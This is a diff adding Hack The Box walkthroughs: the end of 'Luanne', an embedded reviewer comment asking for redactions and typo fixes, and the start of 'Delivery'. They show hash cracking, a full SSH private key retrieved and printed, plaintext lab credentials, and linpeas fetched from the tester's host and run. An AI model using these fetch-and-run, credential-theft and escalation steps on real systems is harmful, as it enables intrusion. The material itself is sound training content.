+ 1g 0:00:00:00 DONE (2021-06-06 10:40) 12.50g/s 38400p/s 38400c/s 38400C/s my3kids..ANTHONY
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+
+And there we go we managed to get the **webapi_user** password **iamthebest** so let's login:
+
+ 
+
+Although that's too bad, the webapi_user isn't of much use yet. Back on our reverse shell, let's enumerate the box with linpeas.sh
+
+
+ $ wget -V
+ sh: wget: not found
+ $ curl -V
+ curl 7.71.0 (x86_64--netbsd) libcurl/7.71.0 OpenSSL/1.1.1d zlib/1.2.10 libidn2/2.3.0 nghttp2/1.41.0
+ Release-Date: 2020-06-24
+ Protocols: dict file ftp ftps gopher http https imap imaps pop3 pop3s rtsp smb smbs smtp smtps telnet tftp
+ Features: AsynchDNS GSS-API HTTP2 HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM NTLM_WB SPNEGO SSL TLS-SRP UnixSockets
+
+
+
+
+We're going to use curl to get **linpeas.sh** onto the box:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ $ curl http://10.10.14.13:9090/linpeas.sh > /tmp/peas.sh
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 333k 100 333k 0 0 856k 0 --:--:-- --:--:-- --:--:-- 853k
+ $ chmod +x /tmp/peas.sh
+ $ /tmp/peas.sh
+
+
+
+Also note how it cannot display the colored linpeas logo because we're not inside of bash:
+
+
+
+As you scroll through the linpeas output you see the following hint that we need to privesc to the r.micahels user:
+
+
+
+
+ $ ps auxw | grep http
+ _httpd 97 0.0 0.0 35256 2328 ? I 8:30AM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/
+ r.michaels 185 0.0 0.0 34996 1988 ? Is 6:50AM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home
+
+
+Since this is a localhost service running on port 3001, we're going to use curl from the box:
+
+
+ $ curl http://127.0.0.1:3001
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 199 100 199 0 0 99500 0 --:--:-- --:--:-- --:--:-- 99500
+
+
+
+ # 401 Unauthorized
+
+
+ /:
+
+
+ No authorization
+
+* * *
+
+[127.0.0.1:3001](//127.0.0.1:3001/)
+
+Since we get a 401 Unauthorized error, let's pass the credentials we found earlier as arguements:
+
+
+ $ curl http://127.0.0.1:3001/ --user webapi_user:iamthebest
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 386 100 386 0 0 77200 0 --:--:-- --:--:-- --:--:-- 77200
+
+
+
+
+
+
+ ### Weather Forecast API
+
+
+
+
+ #### List available cities:
+
+
+ [/weather/forecast?city=list](/weather/forecast?city=list)
+
+
+ #### Five day forecast (London)
+
+
+ [/weather/forecast?city=London](/weather/forecast?city=London)
+
+
+ * * *
+
+
+
+
+
+
+And here we see that the credentials worked ! Now let's try to get the **r.michael** user's private SSH key:
+
+
+ $ curl http://127.0.0.1:3001/~r.michaels/id_rsa --user webapi_user:iamthebest
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 2610 100 2610 0 0 637k 0 --:--:-- --:--:-- --:--:-- 637k
+ -----BEGIN OPENSSH PRIVATE KEY-----
+ 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
+ -----END OPENSSH PRIVATE KEY-----
+
+
+
+And there you go ! now let's login as the r.michaels user via ssh:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → vim id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → file id_rsa
+ id_rsa: OpenSSH private key
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → chmod 600 id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → ssh r.michaels@10.10.10.218 -i id_rsa
+ The authenticity of host '10.10.10.218 (10.10.10.218)' can't be established.
+ ECDSA key fingerprint is SHA256:KB1gw0t+80YeM3PEDp7AjlTqJUN+gdyWKXoCrXn7AZo.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.218' (ECDSA) to the list of known hosts.
+ Last login: Fri Sep 18 07:06:51 2020
+ NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020
+
+ Welcome to NetBSD!
+
+ luanne$ id
+ uid=1000(r.michaels) gid=100(users) groups=100(users)
+ luanne$ ls
+ backups devel public_html user.txt
+ luanne$ cat user.txt
+ eaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you go! We managed to login as the r.michaels user and print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that's done, let's run linpeas again as the r.michaels user:
+
+
+ luanne$ curl http://10.10.14.13:9090/linpeas.sh > /tmp/peas.sh
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 333k 100 333k 0 0 899k 0 --:--:-- --:--:-- --:--:-- 899k
+ luanne$ chmod +x /tmp/peas.sh
+ luanne$ /tmp/peas.sh
+
+
+
+Now as we scroll through the output, we see the following backup file:
+
+
+
+Here we have doas, an alternative to the sudo command, scrolling further we see an encrypted backup file:
+
+
+
+Since this is a NetBSD box, we can decrypt it with **netpgp** :
+
+
+ luanne$ ls
+ backups devel public_html user.txt
+ luanne$ cd backups/
+ luanne$ ls -l
+ total 4
+ -r-------- 1 r.michaels users 1970 Nov 24 2020 **devel_backup-2020-09-16.tar.gz.enc**
+
+ luanne$ **netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/backup.tar.gz**
+ signature 2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14
+ Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a
+ uid RSA 2048-bit key <****r.michaels@localhost>
+
+ luanne$ cd /tmp
+ luanne$ tar -xvf backup.tar.gz
+ x devel-2020-09-16/
+ x devel-2020-09-16/www/
+ x devel-2020-09-16/webapi/
+ x devel-2020-09-16/webapi/weather.lua
+ x devel-2020-09-16/www/index.md
+ x devel-2020-09-16/www/.htpasswd
+ luanne$ cat devel-2020-09-16/www/.htpasswd
+ webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
+
+Once the backup is extracted, we see that we get another password hash for the webapi_user so let's crack it with john just like the previous one:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Luanne]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu
+
+ Not Found.
+ --------------------------------------------------
+ HASH: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
+
+ Possible Hashs:
+ [+] MD5(Unix)
+ --------------------------------------------------
+
+
+Make sure you include the **.** at the end, it is actually part of the hash:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Luanne]
+ → cat hash2
+ $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Luanne]
+ → john -w=/usr/share/wordlists/rockyou.txt hash2
+ Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
+ Use the "--format=md5crypt-long" option to force loading these as that type instead
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ **littlebear (?)**
+ 1g 0:00:00:00 DONE (2021-06-06 11:18) 11.11g/s 145066p/s 145066c/s 145066C/s jayar..hello11
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+And there we go! We managed to get the second webapi_user password, let's test if we can privesc to the root user with the doas binary we found earlier:
+
+
+
+ luanne$ doas su
+ Password:
+ # id
+ uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
+ # cat /root/root.txt
+ 7aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user and print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
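Review bot: the full OpenSSH private key fetched with `curl http://127.0.0.1:3001/~r.michaels/id_rsa --user webapi_user:iamthebest` is reproduced verbatim (the whole base64 body between `-----BEGIN OPENSSH PRIVATE KEY-----` and `-----END OPENSSH PRIVATE KEY-----`); keep only the BEGIN/END marker lines with an elision, since the key material adds nothing to the narrative and a usable private key should not sit in a published writeup, retired lab host or not. The two `.htpasswd` lines that are shown in full and then cracked deserve the same treatment, consistent with how the flags are masked with `XXXX`. Smaller points in this region: `r.micahels` in the linpeas hint sentence and `r.michael` in the SSH-key sentence should both read `r.michaels`, the username shown by `ps auxw` and `id`; `arguements` should be `arguments`; `pickup the fact` should be `pick up the fact`. The lone backtick line after the reverse-shell block, and the empty runs after "let's investigate it:", "Let's list the cities as advised:", "Now from here let's try to inject other commands after the **;**" and the other "we see the following" sentences, are where the `![]()` image embeds were lost; either restore the image references or reword those sentences so they do not point at a figure that is not there.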
diff --git a/Easy/55.md b/Easy/55.md
new file mode 100644
index 0000000..224e94e
--- /dev/null
+++ b/Easy/55.md
@@ -0,0 +1,469 @@
+# Delivery Writeup
+
+
+
+## Introduction :
+
+Delivery is an Easy Linux box released back in January 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ → nmap -vvv -p- 10.10.10.222 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.222
+ Discovered open port 22/tcp on 10.10.10.222
+ Discovered open port 8065/tcp on 10.10.10.222
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ → nmap -sCV -p 80,22,8065 10.10.10.222
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 16:42 CEST
+ Nmap scan report for 10.10.10.222
+ Host is up (0.025s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
+ | 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
+ |_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
+ 80/tcp open http nginx 1.14.2
+ |_http-server-header: nginx/1.14.2
+ |_http-title: Welcome
+ 8065/tcp open unknown
+ | fingerprint-strings:
+ | GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
+ | HTTP/1.1 400 Bad Request
+ | Content-Type: text/plain; charset=utf-8
+ | Connection: close
+ | Request
+ | GetRequest:
+ | HTTP/1.0 200 OK
+ | Accept-Ranges: bytes
+ | Cache-Control: no-cache, max-age=31556926, public
+ | Content-Length: 3108
+ | Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
+ | Content-Type: text/html; charset=utf-8
+ | Last-Modified: Sun, 06 Jun 2021 12:18:32 GMT
+ | X-Frame-Options: SAMEORIGIN
+ | X-Request-Id: w1jipf17ppy1tgk63mkqqkxn1h
+ | X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
+ | Date: Sun, 06 Jun 2021 14:50:30 GMT
+ | HTTPOptions:
+ | HTTP/1.0 405 Method Not Allowed
+ | Date: Sun, 06 Jun 2021 14:50:30 GMT
+ |_ Content-Length: 0
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port8065-TCP:V=7.91%I=7%D=6/6%Time=60BCDEDC%P=x86_64-pc-linux-gnu%r(Gen
+ SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
+ SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
+ SF:0Request")%r(GetRequest,DF3,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\x
+ SF:20bytes\r\nCache-Control:\x20no-cache,\x20max-age=31556926,\x20public\r
+ SF:\nContent-Length:\x203108\r\nContent-Security-Policy:\x20frame-ancestor
+ SF:s\x20'self';\x20script-src\x20'self'\x20cdn\.rudderlabs\.com\r\nContent
+ SF:-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:\x20Sun,\x2006\x
+ SF:20Jun\x202021\x2012:18:32\x20GMT\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX
+ SF:-Request-Id:\x20w1jipf17ppy1tgk63mkqqkxn1h\r\nX-Version-Id:\x205\.30\.0
+ SF:\.5\.30\.1\.57fb31b889bf81d99d8af8176d4bbaaa\.false\r\nDate:\x20Sun,\x2
+ SF:006\x20Jun\x202021\x2014:50:30\x20GMT\r\n\r\n!doctype\x20html>html\x2
+ SF:0lang=\"en\">head>meta\x20charset=\"utf-8\">meta\x20name=\"viewport\
+ SF:"\x20content=\"width=device-width,initial-scale=1,maximum-scale=1,user-
+ SF:scalable=0\">meta\x20name=\"robots\"\x20content=\"noindex,\x20nofollow
+ SF:\">meta\x20name=\"referrer\"\x20content=\"no-referrer\">title>Matterm
+ SF:ost/title>meta\x20name=\"mobile-web-app-capable\"\x20content=\"yes\">
+ SF:meta\x20name=\"application-name\"\x20content=\"Mattermost\">meta\x20n
+ SF:ame=\"format-detection\"\x20content=\"telephone=no\">link\x20re")%r(HT
+ SF:TPOptions,5B,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDate:\x20
+ SF:Sun,\x2006\x20Jun\x202021\x2014:50:30\x20GMT\r\nContent-Length:\x200\r\
+ SF:n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
+ SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
+ SF:00\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
+ SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\
+ SF:r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20
+ SF:Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConn
+ SF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,
+ SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
+ SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 91.89 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it:
+
+
+
+here we are hinted towards the domain name **helpdesk.delivery.htb** so let's add both the domain name and the subdomain to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.222 delivery.htb helpdesk.delivery.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 delivery.htb
+ PING delivery.htb (10.10.10.222) 56(84) bytes of data.
+ 64 bytes from delivery.htb (10.10.10.222): icmp_seq=1 ttl=63 time=25.8 ms
+
+ --- delivery.htb ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 25.761/25.761/25.761/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 helpdesk.delivery.htb
+ PING delivery.htb (10.10.10.222) 56(84) bytes of data.
+ 64 bytes from delivery.htb (10.10.10.222): icmp_seq=1 ttl=63 time=29.8 ms
+
+ --- delivery.htb ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 29.791/29.791/29.791/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ →
+
+
+Delivery.htb is apparently the same website we found earlier, now let's take a look at helpdesk.delivery.htb:
+
+
+
+Here we see that we are on an **osTicket** instance, let's see if we can create a ticket as a guest user:
+
+
+
+We see that our ticket is created successfully:
+
+
+
+Here we are given an email address that has the ticket number in it, so it might be of use later, and we can check the status of our ticket:
+
+ 
+
+Now our nmap scan also picked up port 8065, so let's investigate it:
+
+
+
+Here we see that we are on a Mattermost instance, so let's create an account:
+
+
+
+Let's create an account with the ticket email address that we got provided earlier **9454299@delivery.htb** username **nihilist777** password **TestTest123*** :
+
+
+
+Here we see that we need to check the inbox:
+
+
+
+We get the following message:
+
+
+ ---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=3my3bfb461ko6q34r68mmbypuxrfbt8trmgewq5jefyy8xhbcckgyu86ozbyc8pw&email;=9454299%40delivery.htb ) --------------------- You can sign in from: --------------------- Mattermost lets you share messages and files from your PC or phone, with instant search and archiving. For the best experience, download the apps for PC, Mac, iOS and Android from: https://mattermost.com/download/#mattermostApps ( https://mattermost.com/download/#mattermostApps
+
+
+so we go to **http://delivery.htb:8065/do_verify_email?token=3my3bfb461ko6q34r68mmbypuxrfbt8trmgewq5jefyy8xhbcckgyu86ozbyc8pw &email;=9454299%40delivery.htb** to activate the mattermost account and login:
+
+
+
+**9454299@delivery.htb TestTest123***. Once logged in in the internal chatroom, we see that the root user posted credentials to access the server:
+
+
+
+So let's try to login via SSH to the server with the **maildeliverer:Youve_G0t_Mail!** credentials:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ → ssh maildeliverer@delivery.htb
+ The authenticity of host 'delivery.htb (10.10.10.222)' can't be established.
+ ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'delivery.htb,10.10.10.222' (ECDSA) to the list of known hosts.
+ maildeliverer@delivery.htb's password:
+ Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
+
+ The programs included with the Debian GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ Last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5
+ maildeliverer@Delivery:~$ id
+ uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
+ maildeliverer@Delivery:~$ ls
+ user.txt
+ maildeliverer@Delivery:~$ cat user.txt
+ d6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that we're on the box as the mailedliverer user, let's enumerate the box:
+
+
+ maildeliverer@Delivery:~$ which wget curl python python3 nc
+ /usr/bin/wget
+ /usr/bin/curl
+ /usr/bin/python
+ /usr/bin/python3
+ /usr/bin/nc
+
+
+
+let's get linpeas.sh onto the box:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ maildeliverer@Delivery:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-07 06:23:56-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[======================================================================================================================================================>] 333.85K 2.03MB/s in 0.2s
+
+ 2021-06-07 06:23:56 (2.03 MB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ maildeliverer@Delivery:~$ chmod +x /tmp/peas.sh
+ maildeliverer@Delivery:~$ /tmp/peas.sh
+
+
+
+` 
+
+Now let linpeas.sh run and then scrolling through it's output you will stumble upon mysql:
+
+
+
+And obviously as we saw earlier, there is a mattermost instance running:
+
+
+
+It's in **/opt/mattermost** so let's check it out:
+
+
+ maildeliverer@Delivery:~$ cd /opt/mattermost
+ maildeliverer@Delivery:/opt/mattermost$ ls -lash
+ total 288K
+ 4.0K drwxrwxr-x 12 mattermost mattermost 4.0K Dec 26 09:24 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Dec 26 09:22 ..
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:53 bin
+ 4.0K drwxrwxr-x 7 mattermost mattermost 4.0K Dec 26 09:24 client
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 09:23 config
+ 4.0K drwxrwxr-x 3 mattermost mattermost 4.0K Jun 7 05:15 data
+ 4.0K -rw-rw-r-- 1 mattermost mattermost 2.1K Dec 18 08:52 ENTERPRISE-EDITION-LICENSE.txt
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:52 fonts
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:52 i18n
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 09:23 logs
+ 4.0K -rw-rw-r-- 1 mattermost mattermost 898 Dec 18 08:52 manifest.txt
+ 224K -rw-rw-r-- 1 mattermost mattermost 224K Dec 18 08:52 NOTICE.txt
+ 4.0K drwxr--r-- 5 mattermost mattermost 4.0K Jun 7 05:44 plugins
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:53 prepackaged_plugins
+ 8.0K -rw-rw-r-- 1 mattermost mattermost 6.2K Dec 18 08:52 README.md
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:52 templates
+ maildeliverer@Delivery:/opt/mattermost$ ls -lash config/
+ total 36K
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 09:23 .
+ 4.0K drwxrwxr-x 12 mattermost mattermost 4.0K Dec 26 09:24 ..
+ 4.0K -rw-rw-r-- 1 mattermost mattermost 922 Dec 18 08:52 cloud_defaults.json
+ 20K -rw-rw-r-- 1 mattermost mattermost 19K Jun 7 05:15 config.json
+ 4.0K -rw-rw-r-- 1 mattermost mattermost 243 Dec 18 08:52 README.md
+ maildeliverer@Delivery:/opt/mattermost$ cat config/config.json
+
+
+Here there is a config json file, and when we peek into it, we see the following:
+
+
+ maildeliverer@Delivery:/opt/mattermost/config$ grep -A12 -i 'SqlSettings' config.json
+ "SqlSettings": {
+ "DriverName": "mysql",
